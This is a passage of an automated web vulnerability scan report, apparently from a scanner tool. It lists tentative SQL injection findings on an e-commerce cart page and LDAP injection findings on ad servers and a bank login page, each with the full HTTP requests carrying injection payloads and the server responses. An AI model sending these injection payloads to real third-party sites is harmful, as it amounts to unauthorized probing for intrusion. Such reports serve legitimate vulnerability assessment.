Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SHOP_SESSION_TOKEN=ledng76mlqmvtdngb8nt64bh55; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj6334446388'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:02:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 42568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
<a href="http://www.clone-systems.com/ecommerce">Click here to keep shopping</a>
       </div>

       <div style="display: none">
           <p class="InfoMessage">
               <strong>There are no products in your cart.</strong>
           </p>
           To add a product to your cart, first browse for it or use the search box and then click its &quot;Add to Cart&quot; button.
           <br /><br />
           <a href="http://www.clone-systems.com/ecommerce/">Continue Shopping</a> on the Clone Systems, Inc. home page.
       </div>
   </div>
</div>
           <div class="Block Moveable Panel" id="SuggestiveCartContent" style="">
   <div class="BlockContent">
       <h2>You May Also Like...</h2>
       <p>We found some products that you might also be interested in.</p>
       <ul class="ProductList">
                                       <li class="Odd">
                               <div class="ProductImage">
                                   <a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" ><img src="http://www.clone-systems.com/ecommerce/product_images/n/575/IPCI-01__87161_thumb.png" alt="" /></a>
                               </div>
                               <div class="ProductDetails">
                                   <strong><a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" class="">PCI Scan for a single website</a></strong>
                               </div>
                               <div class="ProductPriceRating">
                                   <em><strike>$129.95</strike> $94.95</em>
                                   <span class="Rating Rating0"><img src="http://www.clone-systems.com/ecommerce/templates/CLONETEMPLATEII/images/IcoRating0.gif" alt="" style="" /></span>
                               </div>
                               <div class="ProductCompareButton" style="display:none">
                                   <input type="checkbox" class="CheckBox" name="compare_product_ids" id="compare_2" value="2" onclick="product_comparison_box_changed(this.checked)" /> <label for="compare_2">Compare</label> <br />
                               </div>
                               <div class="ProductActionAdd" style="display:;">
                                   <a href="http://www.clone-systems.com/ecommerce/cart.php?action=add&amp;product_id=2">Add To Cart</a>
                               </div>
                           </li>                            <li class="Even">
                               <div class="ProductImage">
                                   <a
...[SNIP]...

1.33. http://www.clone-systems.com/ecommerce/cart.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.clone-systems.com
Path:   /ecommerce/cart.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ecommerce/cart.php?suggest=0&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SHOP_SESSION_TOKEN=ledng76mlqmvtdngb8nt64bh55; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:03:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 42635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
<a href="http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/">Click here to keep shopping in PCI ASV Scanning Services</a>
       </div>

       <div style="display: none">
           <p class="InfoMessage">
               <strong>There are no products in your cart.</strong>
           </p>
           To add a product to your cart, first browse for it or use the search box and then click its &quot;Add to Cart&quot; button.
           <br /><br />
           <a href="http://www.clone-systems.com/ecommerce/">Continue Shopping</a> on the Clone Systems, Inc. home page.
       </div>
   </div>
</div>
           <div class="Block Moveable Panel" id="SuggestiveCartContent" style="">
   <div class="BlockContent">
       <h2>You May Also Like...</h2>
       <p>We found some products that you might also be interested in.</p>
       <ul class="ProductList">
                                       <li class="Odd">
                               <div class="ProductImage">
                                   <a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" ><img src="http://www.clone-systems.com/ecommerce/product_images/n/575/IPCI-01__87161_thumb.png" alt="" /></a>
                               </div>
                               <div class="ProductDetails">
                                   <strong><a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" class="">PCI Scan for a single website</a></strong>
                               </div>
                               <div class="ProductPriceRating">
                                   <em><strike>$129.95</strike> $94.95</em>
                                   <span class="Rating Rating0"><img src="http://www.clone-systems.com/ecommerce/templates/CLONETEMPLATEII/images/IcoRating0.gif" alt="" style="" /></span>
                               </div>
                               <div class="ProductCompareButton" style="display:none">
                                   <input type="checkbox" class="CheckBox" name="compare_product_ids" id="compare_2" value="2" onclick="product_comparison_box_changed(this.checked)" /> <label for="compare_2">Compare</label> <br />
                               </div>
                               <div class="ProductActionAdd" style="display:;">
                                   <a href="http://www.clone-systems.com/ecommerce/cart.php?action=add&amp;product_id=2">Add To Cart</a>
                               </div>
                           </li>                
...[SNIP]...

Request 2

GET /ecommerce/cart.php?suggest=0&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SHOP_SESSION_TOKEN=ledng76mlqmvtdngb8nt64bh55; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:03:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 42568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
<a href="http://www.clone-systems.com/ecommerce">Click here to keep shopping</a>
       </div>

       <div style="display: none">
           <p class="InfoMessage">
               <strong>There are no products in your cart.</strong>
           </p>
           To add a product to your cart, first browse for it or use the search box and then click its &quot;Add to Cart&quot; button.
           <br /><br />
           <a href="http://www.clone-systems.com/ecommerce/">Continue Shopping</a> on the Clone Systems, Inc. home page.
       </div>
   </div>
</div>
           <div class="Block Moveable Panel" id="SuggestiveCartContent" style="">
   <div class="BlockContent">
       <h2>You May Also Like...</h2>
       <p>We found some products that you might also be interested in.</p>
       <ul class="ProductList">
                                       <li class="Odd">
                               <div class="ProductImage">
                                   <a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" ><img src="http://www.clone-systems.com/ecommerce/product_images/n/575/IPCI-01__87161_thumb.png" alt="" /></a>
                               </div>
                               <div class="ProductDetails">
                                   <strong><a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" class="">PCI Scan for a single website</a></strong>
                               </div>
                               <div class="ProductPriceRating">
                                   <em><strike>$129.95</strike> $94.95</em>
                                   <span class="Rating Rating0"><img src="http://www.clone-systems.com/ecommerce/templates/CLONETEMPLATEII/images/IcoRating0.gif" alt="" style="" /></span>
                               </div>
                               <div class="ProductCompareButton" style="display:none">
                                   <input type="checkbox" class="CheckBox" name="compare_product_ids" id="compare_2" value="2" onclick="product_comparison_box_changed(this.checked)" /> <label for="compare_2">Compare</label> <br />
                               </div>
                               <div class="ProductActionAdd" style="display:;">
                                   <a href="http://www.clone-systems.com/ecommerce/cart.php?action=add&amp;product_id=2">Add To Cart</a>
                               </div>
                           </li>                            <li class="Even">
                               <div class="ProductImage">
                                   <a
...[SNIP]...

2. LDAP injection  previous  next
There are 9 instances of this issue:


2.1. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3

Issue detail

The client parameter appears to be vulnerable to LDAP injection attacks.

The payloads 4c58e894af09d5bd)(sn=* and 4c58e894af09d5bd)!(sn=* were each submitted in the client parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=4c58e894af09d5bd)(sn=*&adurl=;ord=2114915439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 11:38:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 821

<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af5/c/1ea/%2a/u;228460640;0-0;0;50161665;3454-728/90;39921263/39939050/1;;~sscs=%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=4c58e894af09d5bd)(sn=*&adurl=http%3a%2f%2fwww.transunion.com/%3Fam%3D2033%26channel%3Dpaid%26cid%3Ddisplay%3A2033"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_728x90.gif" border=0 alt="Advertisement"></a>

Request 2

GET /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=4c58e894af09d5bd)!(sn=*&adurl=;ord=2114915439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 11:38:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 835

<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af5/c/1eb/%2a/k;228460640;1-0;0;50161665;3454-728/90;39961083/39978870/1;;~sscs=%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=4c58e894af09d5bd)!(sn=*&adurl=http%3a%2f%2fwww.transunion.com/%3Fam%3D2033%26channel%3Dpaid%26cid%3Ddisplay%3A2033"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_728x90_Free2011Score.gif" border=0 alt="Advertisement"></a>

2.2. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3

Issue detail

The num parameter appears to be vulnerable to LDAP injection attacks.

The payloads 3beb1e7094e1a2ad)(sn=* and 3beb1e7094e1a2ad)!(sn=* were each submitted in the num parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=3beb1e7094e1a2ad)(sn=*&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-4063878933780912&adurl=;ord=2114915439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 11:36:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 843

<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af5/c/200/%2a/u;228460640;0-0;0;50161665;3454-728/90;39921263/39939050/1;;~sscs=%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=3beb1e7094e1a2ad)(sn=*&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.transunion.com/%3Fam%3D2033%26channel%3Dpaid%26cid%3Ddisplay%3A2033"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_728x90.gif" border=0 alt="Advertisement"></a>

Request 2

GET /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=3beb1e7094e1a2ad)!(sn=*&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-4063878933780912&adurl=;ord=2114915439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 11:36:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 857

<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af5/c/201/%2a/k;228460640;1-0;0;50161665;3454-728/90;39961083/39978870/1;;~sscs=%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=3beb1e7094e1a2ad)!(sn=*&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-4063878933780912&adurl=http%3a%2f%2fwww.transunion.com/%3Fam%3D2033%26channel%3Dpaid%26cid%3Ddisplay%3A2033"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_728x90_Free2011Score.gif" border=0 alt="Advertisement"></a>

2.3. https://militarybankonline.bankofamerica.com/efs/servlet/military/login-wait.jsp [TCID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://militarybankonline.bankofamerica.com
Path:   /efs/servlet/military/login-wait.jsp

Issue detail

The TCID cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the TCID cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /efs/servlet/military/login-wait.jsp HTTP/1.1
Host: militarybankonline.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000HPVCjNCdRvjHV0dGZx6wnu9:13393tt7e; TCID=*)(sn=*; LANG_COOKIE=en_US; state=MA; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; hp_beta=B; cmTPSet=Y; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; throttle_value=35;

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:41:40 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Cache-Control: no-cache
Cache-Control: max-age=0, must-revalidate
Expires: 0
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 9016


<!-- login-wait.jsp -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<noscript>
<META HTTP-EQUIV="Refresh" CONTENT="0;URL=/efs/servl
...[SNIP]...
<h1 class="pageTitle">Sorry</h1><a name="skipnav"></a></td>
       <td align="right" class="nav3" valign="top">
       </td>
       <td><img src="/efs/grafx/spacer.gif" width="10" height="1" border="0" alt=""></td>
   </tr>
   <tr>
       <td colspan="4"><img src="/efs/grafx/spacer.gif" alt="" width="1" height="4"></td>
   </tr>
   <tr>
       <td width="1%"><img src="/efs/grafx/spacer.gif" width="10" height="1" border="0" alt=" "></td>
       <td colspan="3" class="rule-blue1" ><img src="/efs/grafx/spacer.gif" alt="" width="1" height="1"></td>
   </tr>

</table>
<div><img src="/efs/grafx/spacer.gif" alt=" " width="1" height="40"></div>
<!-- end nav 3 -->


<!-- BEGIN CONTENT AREA -->
<div id="content" >
   
<!-- file: befs\html\v4\content\online\2000\login-wait.jsp
// This file is part of business e-finance suite (befs).
// It contains business specific info, and is different from the same named cefs file. -->


<!-- file: befs\html\v4\content\online\2000\login-wait.jsp
